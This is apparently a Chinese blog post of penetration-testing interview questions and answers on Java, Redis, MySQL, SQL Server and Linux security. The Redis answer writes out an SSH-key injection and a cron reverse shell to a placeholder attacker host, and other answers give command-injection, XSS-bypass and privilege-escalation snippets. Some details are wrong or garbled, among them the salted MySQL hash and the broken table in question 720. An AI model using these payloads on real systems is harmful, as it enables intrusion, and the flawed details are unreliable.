2026年渗透测试面试题总结-24(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[691. \u0023 字符编码及 payload 作用](#691. \u0023 字符编码及 payload 作用)

[692. Java 执行系统命令的漏洞与方法](#692. Java 执行系统命令的漏洞与方法)

[693-694. Java 修复 XSS 漏洞的层级与 Filter 设置](#693-694. Java 修复 XSS 漏洞的层级与 Filter 设置)

[695. Java 类反射的安全问题](#695. Java 类反射的安全问题)

[696. Java 反序列化漏洞与修复](#696. Java 反序列化漏洞与修复)

[697. 常见 Java 框架](#697. 常见 Java 框架)

[698. Redis 未授权访问漏洞利用](#698. Redis 未授权访问漏洞利用)

[699. 中间件解析漏洞利用](#699. 中间件解析漏洞利用)

[700-703. Java 中间件容器及安全](#700-703. Java 中间件容器及安全)

[704-705. MySQL 权限与安全加固](#704-705. MySQL 权限与安全加固)

[706. SQL Server Public 权限提权](#706. SQL Server Public 权限提权)

[707. Linux 系统加固思路](#707. Linux 系统加固思路)

[708-710. MySQL 存储与加密](#708-710. MySQL 存储与加密)

[711-716. Linux 安全运维](#711-716. Linux 安全运维)

[719. Linux 入侵应急响应](#719. Linux 入侵应急响应)

[720. 注入点数据库类型判断](#720. 注入点数据库类型判断)

复制代码
691	\u0023是什么字符的16进制编码?为什么在payload中要用他?
692	java会不会发生执行系统命令的漏洞?java都有哪些语句,方法可以执行系统命令?
693	如果叫你修复一个xss漏洞,你会在java程序的那个层里面进行修复?
694	xss filter在java程序的哪里设置?
695	说下java的类反射在安全上可能存在哪些问题
696	Java反序列化漏洞的原理?解决方案?
697	你都了解哪些java框架?
698	Redis未授权访问漏洞如何入侵利用?
699	说说常见的中间件解析漏洞利用方式
700	JAVA有哪些比较常见的中间件容器?
701	tomcat要做哪些安全加固?
702	如果tomcat重启的话,webapps下,你删除的后台会不会又回来?
703	常见的网站服务器中间件容器。
704	mysql表权限里面,除了增删改查,文件读写,还有哪些权限?
705	mysql安全要如何做?
706	sqlserver public权限要如何提权
707	Windows、Linux、数据库的加固降权思路,任选其一
708	mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?
709	mysql数据库默认有哪些库?说出库的名字
710	mysql UDF提权5.1以上版本和5.1以下有什么区别
711	简述Linux系统安全加固需要做哪些方面?
712	你使用什么工具来判断系统是否存在后门?
713	Linux的Selinux是什么?如何设置Selinux?
714	iptables工作在TCPIP模型中的哪层?
715	如果无法升级内核,那么如何保证系统不被已知的exp提权?
716	syslog里面都有哪些日志?安装软件的日志去哪找?
717	如何查询ssh的登录日志?如何配置syslog的日志格式?
718	syslog可不可以使用vi等工具直接查看?是二进制文件吗?
719	如果一台Linux服务器被入侵后
720	找到一个注入点怎么判断对方什么数据库?

691. \u0023 字符编码及 payload 作用

  • 字符本质 :Unicode 编码 \u0023 对应 # 符号(ASCII 35)
  • Payload 作用
    1. 绕过过滤 :WAF 可能未解析 Unicode,\u0023 可替代 # 用于 CSS 选择器(如 XSS:<style>\u0023id{color:red}</style>
    2. 混淆攻击:在 JSON/JavaScript 中避免语法错误,维持代码结构

692. Java 执行系统命令的漏洞与方法

  • 可能漏洞场景
    未过滤的用户输入直接传入命令执行方法(如 Runtime.exec()

  • 危险方法

    复制代码
    Java

    Runtime.getRuntime().exec("ping " + userInput); // 直接拼接导致命令注入 ProcessBuilder pb = new ProcessBuilder(userCommand); new GroovyShell().evaluate(userScript); // Groovy 引擎执行


693-694. Java 修复 XSS 漏洞的层级与 Filter 设置

修复层级 位置 修复方案
Controller 层 Spring MVC @Controller 输出前编码:StringEscapeUtils.escapeHtml4(userInput)
View 层 JSP/Thymeleaf 模板引擎自动转义(Thymeleaf 默认开启)
全局过滤器 web.xmlFilter 注册 XSS Filter:对 HttpServletRequest 包装,重写 getParameter() 过滤

695. Java 类反射的安全问题

  • 风险场景
    1. 敏感方法调用 :反射调用 setAccessible(true) 突破私有限制
    2. RCE 利用 :通过反射触发 Runtime.exec()
    3. 反序列化攻击:反射构造恶意对象链
  • 防御 :启用安全管理器 SecurityManager,配置策略文件限制反射权限

696. Java 反序列化漏洞与修复

  • 原理
    攻击者构造恶意序列化数据 -> ObjectInputStream.readObject() 触发危险链(如 Apache Commons Collections 的 Transformer 链)
  • 解决方案
    1. 升级依赖库(如 Commons Collections 4.4+)
    2. 使用 SerialKiller 等安全过滤器
    3. 替换 JSON 序列化(Jackson/Gson)

697. 常见 Java 框架

框架类型 代表 安全关注点
Web 框架 Spring MVC, Struts2 OGNL 注入、路由劫持
ORM 框架 Hibernate, MyBatis SQL 注入($ 拼接风险)
依赖注入 Spring Boot 自动配置暴露未授权端点

698. Redis 未授权访问漏洞利用

  1. 写入 SSH 公钥

    复制代码
    Bash

    redis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3N...\n\n" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ && config set dbfilename authorized_keys

  2. 定时任务反弹 Shell
    SET payload "\n* * * * * bash -i >& /dev/tcp/attacker/port 0>&1\n"
    CONFIG SET dir /var/spool/cron/ && CONFIG SET dbfilename root


699. 中间件解析漏洞利用

中间件 漏洞形式 利用示例
Nginx 路径解析错误 /test.jpg/.php 执行 PHP 代码
Apache 多后缀解析(test.php.jpg 上传含 PHP 代码的 .php.jpg
IIS 6.0 分号截断(test.asp;.jpg 图片马解析为 ASP

700-703. Java 中间件容器及安全

  • 常见容器
    Tomcat、Jetty、WebLogic、WebSphere
  • Tomcat 加固
    1. 删除默认应用:清空 webapps/ROOT/, webapps/docs/
    2. 禁用管理界面:删除 webapps/manager/ 或配置强认证
    3. 降权运行:创建专用用户启动 Tomcat
    4. 配置 server.xml:关闭 autoDeploy,禁用 AJP 端口
  • 重启影响
    删除的 webapps 下应用不会自动恢复(除非配置了热部署或外部仓库同步)

704-705. MySQL 权限与安全加固

  • 表权限细分
    CREATE ROUTINE(存储过程)、EXECUTE(执行)、SHOW VIEW(视图查看)
  • 安全加固
    1. 最小权限原则:禁止 FILE/PROCESS/SUPER 权限

    2. 配置文件安全:

      复制代码
      Ini

      [mysqld] skip_symbolic_links=ON # 禁用符号链接 local_infile=0 # 禁止本地文件加载

    3. 加密通信:启用 SSL(REQUIRE SSL


706. SQL Server Public 权限提权

  • 利用方式
    1. 滥用可信数据库:sp_addrolemember 'db_owner', 'public'
    2. 存储过程注入:利用 xp_cmdshell 若未禁用
    3. 模拟权限:EXECUTE AS LOGIN = 'sa' 结合漏洞提权

707. Linux 系统加固思路

  1. 账户安全

    • 禁用 root SSH 登录,强制密钥认证
    • 配置 sudo 权限白名单
  2. 文件系统

    • chattr +i /etc/passwd 防篡改
    • /tmp 挂载为 noexec,nosuid
  3. 内核参数

    复制代码
    Bash

    sysctl -w kernel.randomize_va_space=2 # 开启 ASLR sysctl -w net.ipv4.icmp_echo_ignore_all=1 # 禁 Ping


708-710. MySQL 存储与加密

  • 密码存储
    表名:mysql.user
    加密方式:
    • MySQL 5.7 前:SHA1(SHA1(password)) + 盐
    • MySQL 8.0+:caching_sha2_password
  • 默认库
    information_schema, mysql, performance_schema, sys
  • UDF 提权差异
    • 5.1 以下 :DLL 放入 system32
    • 5.1 以上 :需放置到 plugin_dir 指定目录

711-716. Linux 安全运维

  • 加固要点

    1. SELinux
      • 模式设置:setenforce 1(强制模式)
      • 策略管理:semanage port -a -t http_port_t -p tcp 8080
    2. iptables 层级:工作在网络层(OSI L3)
    3. 防已知 EXP
      • 禁用高危模块:modprobe -r nf_nat_ftp
      • Seccomp 限制系统调用
  • 日志分析

    日志类型 路径
    SSH 登录 /var/log/auth.log
    软件安装 /var/log/dpkg.log (Debian)
    Syslog 格式配置 /etc/rsyslog.conf
    • Syslog 查看 :文本文件(vi /var/log/syslog),非二进制

719. Linux 入侵应急响应

  1. 隔离网络:立即断网

  2. 取证备份

    复制代码
    Bash

    dd if=/dev/sda1 of=/evidence.img bs=1M # 磁盘镜像 ps auxf > /proc_list.txt # 进程快照

  3. 排查后门

    • 工具:chkrootkit, rkhunter
    • 手动检查:netstat -antp(异常连接)、crontab -l(恶意任务)

720. 注入点数据库类型判断

特征 数据库
注释符
-- (末尾空格) Oracle, SQL Server
# MySQL
字符串拼接
`'abc'
CONCAT('a','b') MySQL
报错信息
ORA-xxxx Oracle
SQLSTATE[42S22] SQL Server
相关推荐
SmartBrain2 小时前
Python 特性(第一部分):知识点讲解(含示例)
开发语言·人工智能·python·算法
Lun3866buzha2 小时前
基于YOLO11-C3k2-FFCM:跳甲虫害叶片智能检测与识别系统
python
byzh_rc2 小时前
[深度学习网络从入门到入土] 网络中的网络NiN
网络·人工智能·深度学习
Gaosiy2 小时前
技术细节-MNE读取neuroscan curry9版本cdt文件
python·脑机接口·脑电·mne
SmartBrain2 小时前
FastAPI进阶(第一部分):路由和依赖特性(含考题)
开发语言·python
nimadan122 小时前
**手机写小说软件有哪些2025推荐,适配不同创作习惯的实用
python·智能手机
Liue612312313 小时前
基于MS-RCNN和X101-64x4d_FPN的船舶类型识别与检测方法研究
python
Sunsets_Red3 小时前
浅谈随机化与模拟退火
java·c语言·c++·python·算法·c#·信息学竞赛
Bruce_Liuxiaowei3 小时前
渗透测试中的提权漏洞:从低权限到系统控制的全解析
网络·windows·安全